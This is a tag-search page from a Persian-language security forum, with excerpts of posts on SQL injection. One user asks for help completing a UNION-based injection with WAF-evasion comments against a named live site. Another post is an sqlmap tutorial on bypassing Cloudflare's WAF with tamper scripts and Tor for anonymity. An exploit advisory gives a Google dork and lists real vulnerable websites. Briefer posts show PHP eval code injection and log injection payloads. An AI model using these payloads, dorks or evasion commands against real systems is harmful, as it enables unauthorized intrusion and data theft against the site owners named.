با توجه به آماده سازی و تامین زیرساخت لازم جهت تبدیل انجمن به یک منبع آموزشی در حوزه امنیت و ارزیابی امنیت، لطفا فایل های خود را در انجمن پیوست نمایید. در غیر این صورت تاپیک شما حذف خواهد شد.
جستجو در تالارهای گفتگو
در حال نمایش نتایج برای برچسب های 'sql injection'.
10 نتیجه پیدا شد
-
آموزش SQL injection به روش Error Based سوال بود در خدمتم موفق باشيد error_based.rar
-
question مشکل پیدا نکردن راه مناسب برای تزریق Sql از طیق Havij یا Sqlmap
یک موضوع پاسخی ارسال کرد برای arsenic در Web Application Security Q/A
سلام من یک سایت پیدا کردم که باگ sql injection احساس می کنم داره . حالا از کجا این حرفو میزنم؟ خوب این آدرسه این صفحه از سایت هست: target.com/news_more.php?id=23 حالا وقتی من یک ' انتهای آدرس سایت میذارم این پیغامو به من میده: Fatal _error_: Uncaught _error_: Call to a member function fetch_assoc() on boolean in /home2/rakum0091/public_html/news_more.php:94 Stack trace: #0 {main} thrown in /home2/rakum0091/public_html/news_more.php on line 94 حالا به نظرتون ایراد کار از کجاست؟- 2 پاسخ
-
- havij
- sql injection
-
(و 1 مورد دیگر)
برچسب زده شده با :
-
با سلام خدمت دوستان عزیز در این فیلم اموزشی هک سایت با هویج رو به شما اموزش میدم لینک دانلود : http://uplod.ir/3qj4bfkhfrk8/hacking_site_via_Havij.rar.htm
-
با سلام خدمت همه دوستان و عزیزان با توجه به اینکه بخش Database Hacking خالیست و آموزش های مفیدی در آن نیست با مدیران تصمیم گرفتیم پست های غیر مفید را حذف و آموزش های مفید قرار بدیم ! باتوجه به عنوان آموزش ها به صورت کوتاه و قدم به قدم است و به اینصورت بهتر میتونیم بهتر Sql Injection درک کنیم ! از Promis جان و دیگر دوستان که در این بخش کمک کردند , متشکرم ! قوانین : 1- از اسپم به شدت بپردازید . 2-سوالات خود را در بخش Q/A مطرح کنید . 3- از کپی کردن از سایت های دیگر به شدت خوداری کنید نکته : سعی کنید آموزش ها تا حد امکان ساده باشد و بصورت ویدئویی باشد .
-
question مشکل در اینجکت کردن تارگت
یک موضوع پاسخی ارسال کرد برای alimoradi در Web Application Security Q/A
سلام در اینجکت کردن این تارگت به مشکل برخوردم ممنون میشم ادامه اینجکت رو راهنمایی کنید. http://mlavie.ca/evenement.php?primaire=-1519677164+/*!50000union*/+/*!50000select*/+1,/*!50000GrOuP_CoNcAT(table_name)*/,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+/*!50000inforMAtion_schema*/.tables+/*!50000wHEre*/+/*!50000taBLe_scheMA*/like+database()--+ تا بابیپس تیبل ها پیش میرم ولی تیبل ها رو نمایش نمیده چجوری باید بایپس بشه ؟ -
Bypass کردن Cloudflare Waf توسط Sqlmap و حمله Sql Injection
یک موضوع پاسخی ارسال کرد برای Wikto در تحلیل و بررسی آسیب پذیری های سایت و سرورها
معرفی در فرایند اسکن توسط SQLMAP ممکن است هشداری مبنی بر این که وب سایت هدف شما با استفاده از فایروال (Web Application (WAF مانند Cloudflare محافظت می شود روبرو شوید ، سیستم های پیشگیری از نفوذ (IPS)، سیستم تشخیص نفوذ (IDS) و ... ممکن است به طور فزاینده ای تزریق (SQL (SQLi و موفقیت های شما را به چالش بکشند . هنگامی که هدف های مورد نظر شما WAF را اجرا می کنند ، تزریقات معمول SQL و اسکریپت های عادی برای تلاش های بهره برداری از امنیت برنامه های وب بی تاثیر است . خوشبختانه SQLMAP دارای یک ویژگی برچسب "tamper script" است که شما را قادر می سازد تا بررسی کنید آیا سایت آسیب پذیر است و آسیب پذیری SQLi دارد یا خیر و به طور بالقوه امضاهای WAF را می تواند دور بزند (Bypass) انواع متد ها : نکته 1: SQLMAP یک ابزار بسیار موثر است که باید فقط برای اهداف آزمایش نفوذ استفاده شود. حتی یک مبتدی که از SQLMAP استفاده می کند می تواند تاثیرات مخربی روی سیستم هدف داشته باشد . این ابزار پرسشهای متعددی را تولید می کند که ممکن است به طور قابل ملاحظه ای در پایگاه داده هدف تاثیر بگذارد. برای حداکثر اثربخشی این ابزار، توصیه می شود قبل از استفاده از SQLi به طور کامل شناخت داشته باشید. بنابراین، بهتر است که SQLMap را در سیستم هایی که تنها برای آزمایشات مورد استفاده قرار می گیرند، بکار ببرید . 1 . بررسی (شناسایی) WAF وب سایت که محافظت از برنامه وب را بر عهده دارد Sqlmap –u <Target….?id=0> --identify-waf –tamper=”between,randomcase,space2comment” –v 3 –random-agent برای بررسی اینکه آیا سایت هدف از WAF Cloudflare استفاده می کند ، ModSecurity یا بعضی از WAF های شناخته شده مانند Sucuri / Incapsula / F5 ، از گزینه زیر در SQLMAP استفاده کنید : –identity-waf OR –check-waf از "- = thread =" استفاده نکنید که بزرگتر از 1 باشد ، زیرا ممکن است به 403 Error Forbidden منجر شود که نشان می دهد آدرس IP شما ممنوع (banned) شده است از این رو، بهتر است که از پروکسی ها برای رسیدن به هدف و نفوذ به سایت استفاده کنیم نکته 2: اگر قبلا SQLMAP را دانلود نکرده اید، می توانید این کار را از سایت رسمی گیت هاب انجام دهید. نکته 3: مشاهده بیش از حد بسیاری از کدهای خطای 4xx / 5xx HTTP ممکن است نشان دهد که WAF در محیط برنامه وب مورد استفاده قرار می گیرد به یاد داشته همیشه می توانید دوباره اسکن کنید 2 .لازم است که در این مرحله از پروکسی ها استفاده کنید و به طور معمول از پروکسی های Tor استفاده می شود اما به طور مستقل نمیتوانم در هر زمانی اتصال به سرور های پروکسی را تایید کنم بنابراین شخص نفوذگر خود باید شخصا چاره ایی برای این کار پیدا کند یا از پروکسی های دیگر استفاده کند اما در اینجا یک اموزش کوتاه برای کمک به ناشناس بودن را ارائه میکنم بنابراین از گزینه های زیر در SQLMAP استفاده کنید : –tor (Tor will be enabled as SQLMAP will attempt to apply the Tor proxy settings automatically.) –tor-port (Apply Tor proxy manually) –tor-type (Apply Tor proxy manually) 3. فعال کردن عامل تصادفی از گزینه زیر برای عامل تصادفی استفاده کنید : –random-agent برای بررسی اینکه آیا Tor به درستی با SQLMAP کار می کند، از گزینه زیر استفاده کنید : –check-tor 4. پیدا کردن اسکریپت پایتون در دایرکتوری SQLMAP: به دایرکتوری SQLMAP بروید. یک دایرکتوری با نام "tamper" که دارای اسکریپت های پایتون است که می توانید استفاده کنید. اسکریپت های جانبی پایتون : گرفتن اسکریپت های بیشتری از پایتون برای استفاده با گزینه SQLMAP Tamper از اینجا . 5. طریقه استفاده راحت از اسکریپت پایتون SQLMAP : استقرار اسکریپت tamper بسیار آسان است : python sqlmap.py <options> --tamper="<script-name>.py" مثال های SQLMAP Tamper Script : به عنوان مثال، از لحاظ MSSQL، MySQL، و تست نفوذ معمولی - شما می توانید از اسکریپت های تروجان زیر استفاده کنید : between randomcase space2comment charunicodeencode (Discussed further in NOTE 4) percentage (Discussed further in NOTE 4) برای MySQL، می توانید اسکریپت های تروجان زیر را اعمال کنید : space2hash space2mysqlblank charunicodeencode (Discussed further in NOTE 4) percentage (Discussed further in NOTE 4) نکته 4: برای مخفی کردن پیلود های معکوس در ASP و ASP.NET، از اسکریپت های زیر استفاده کنید: charunicodeencode percentage نمونه کامندهای SQLMAP Tamper Script : پس از تایید اینکه سایت هدف توسط WAF مانند Cloudflare محافظت می شود، می توانید از یکی از دو دستور زیر استفاده کنید : python sqlmap.py -u "https://www.thetargetdomain/" --identify-waf --tamper="between,randomcase,space2comment" -v 3 --random-agent --tor python sqlmap.py -u "https://www.thetargetdomain/" --check-waf --tamper="between,randomcase,space2comment" -v 3 --random-agent --tor نتیجه البته، این آموزش SQLMAP صرفا محدود به دور زدن محافظت Cloudflare WAF نیست، بلکه برای دیگر راه حل های امنیتی نیز کاربرد دارد. این ابزار می تواند حداکثر توانایی خود را در دست یک تست نفوذ کننده حرفه ای با دانش گسترده SQLi و امنیت نرم افزار به دست آورد . حتی یک مبتدی می تواند از این ابزار برای ایجاد اثرات قابل توجه استفاده کند. شاید مهمترین مسئله که در ذهن داشته باشیم ، ذهنیت تست نفوذ است اگر در تست نفوذ شکست خوردید یا به مشکلاتی برخورد کردید تلاش خود را از دست ندهید ( کپی با ذکر منبع )-
- cloudflare
- sql injection
-
(و 3 مورد دیگر)
برچسب زده شده با :
-
با سلام گفتم یه تاپیکت جدید باز بشه تا اسپم نشه که البته آموزش هایی هم در اینجا قرار خواهد گرفت با ارتباط همین موضوع جا داره یه توضیح کوتاه بدم در مورد تارگتی که دوستمون قرار دادند تا دوستان به اشتباه نیافتند در مورد اینکه در کد نویسی این تارگت اشتباهاتی رخ داده شکی نیست اما در این نوع تارگتی که قرار گرفت sql injection وجود ندارد به دلیل اینکه کوئری که وارد میکنید هیچ تاثیری نداره و فقط و فقط از شما int میگیره و اگر string وارد کنید بصورت خنثی دریافت میکنه جوری که مثلا print "string" زده شده ایشالله در اینده آموزش sql injection در همچین فریم ورک هایی قرار خواهد گرفت موفق باشید
-
|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*| |--------------------------------------------------------------| |[+] Exploit Title: 2X Ajans SQL injection |[+] |[+] Exploit Author: Iran Cyber Security Group |[+] Discovered By: r4j4z |[+] Vendor Homepage: http://www.2xajans.com |[+] Tested on : Windows |[+] Google Dork: intext:Design by 2X Ajans inurl:id= |[+] Home: iran-cyber.org |--------------------------------------------------------------| |[+] Examples : |[+] |[+] http://ustungucaktarma.com/urunler.php?id=9%27 |[+] |[+] http://www.gazibant.com/urunler.php?id=6%27 |[+] |[+] http://usgmadencilik.com/urun-detay.php?id=2%27 |*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*| https://cxsecurity.com/issue/WLB-2018040110
-
بررسی آسیب پذیری تزریق کد | Code Injection Vulnerability
یک موضوع پاسخی ارسال کرد برای 0xD0ctor در تحلیل و بررسی آسیب پذیری های سایت و سرورها
سلام خدمت تمامی دوستان با یکی دیگه از آموزش های بررسی مختصر و مفید آسیب پذیری های تحت وب در خدمت شما هستیم ../ خب توی این تاپیک قصد داریم Code Injection رو توضیح بدیم ../ توی یک جمله مختصر و مفید میشه معرفیش کرد : آسیب پذیری که توسز اون میتونید Code های خودتون رو اجرا کنید ( اینجا منظور کد PHP ) ../ خب برای درک بهتر نمونه کدی ببینیم : $variable_id = "varid"; $x = $_GET['id']; eval("\$varid = \$x;"); خب اینجا کسی اگه یکم دقت کنه میتونه ببینه که از eval استفاده شده و راحت میشه کد PHP دلخواه رو اجرا کرد ../ خب مثال میزنیم ... اگه پارامتر ورودی id رو قرار بدیم : file.php?id=1; phpinfo() راحت میشه phpinfo رو دید و به راحتی میشه Code Injection رو انجام داد ../ امیدوارم مورد قبول واقع شده باشه، موفق باشید-
- code injection
- exploit
-
(و 5 مورد دیگر)
برچسب زده شده با :
-
بررسی آسیب پذیری تزریق لاگ | Log Injection Vulnerability
یک موضوع پاسخی ارسال کرد برای 0xD0ctor در تحلیل و بررسی آسیب پذیری های سایت و سرورها
سلام دوستان امروز میخوایم آسیب پذیری Log Injection رو به شما معرفی میکنیم ../ این آسیب پذیری به شما کمک میکنه که بتونید لاگی که خودتون دوست دارید رو توی لاگ بریزید ../ نمونه ای از این آسیب پذیری رو ببینید : String val = request.getParameter("val"); try { int value = Integer.parseInt(val); } catch (NumberFormatException) { log.info("Failed to parse val = " + val); } خب میبینید که اینجا صفحه پارامتد ورودی val رو میگیره و اگه عددی بود اون رو توی value میریزه و اگه نبود توی فایل لاگ متنی به این صورت قرار میده : INFO: Failed to parse val = (MATN) خب حالا شما به راحتی میتونید val رو هر چیزی بخواید بزارید و در لاگ قرار بدید ../ برای نمونه اگه پارامتر ورودی val رو با مقدار test%0a%0aINFO:+User+logged+out%3dc10n3r ارسال کنید اون موقع توی لاگ این قطعه قرار داده میشه : INFO: Failed to parse val=test INFO: User logged out=c10n3r موفق باشید-
- cross site scripting
- exploit
-
(و 8 مورد دیگر)
برچسب زده شده با :
تاریخچه انجمن امنیتی ایران سایبر
شرکت امنیتی ایران سایبر با بکار گیری افراد متخصص در حوزه امنیت و ارائه راه کار در زمینه امنیت شبکه و امنیت بانک های اطلاعاتی در سال ۲۰۰۹ کار خود را آغاز نمود.
این شرکت با تعریفی جدید از ارائه خدمات و مشاوره در حوزه امنیت سازمان ها و مراکز، تست نفوذ، و برنامه نویسی در تعاملی سازنده با سازمان ها، مشتری مداری را سرلوحه کار خود قرار داده و آماده همکاری با شرکت ها و ارگان های مختلف می باشد.
آدرس های داخلی شرکت
آدرس های داخلی شرکت
رعایت قوانین
شرکت و انجمن امنیتی ایران سایبر با توجه به حضور مجاز و رسمی در محافل امنیتی و شرکت های ارزیابی امنیت ملزم به رعایت قوانین بوده و کاربران انجمن نیز ملزم به رعایت قوانین جمهوری اسلامی ایران میباشد.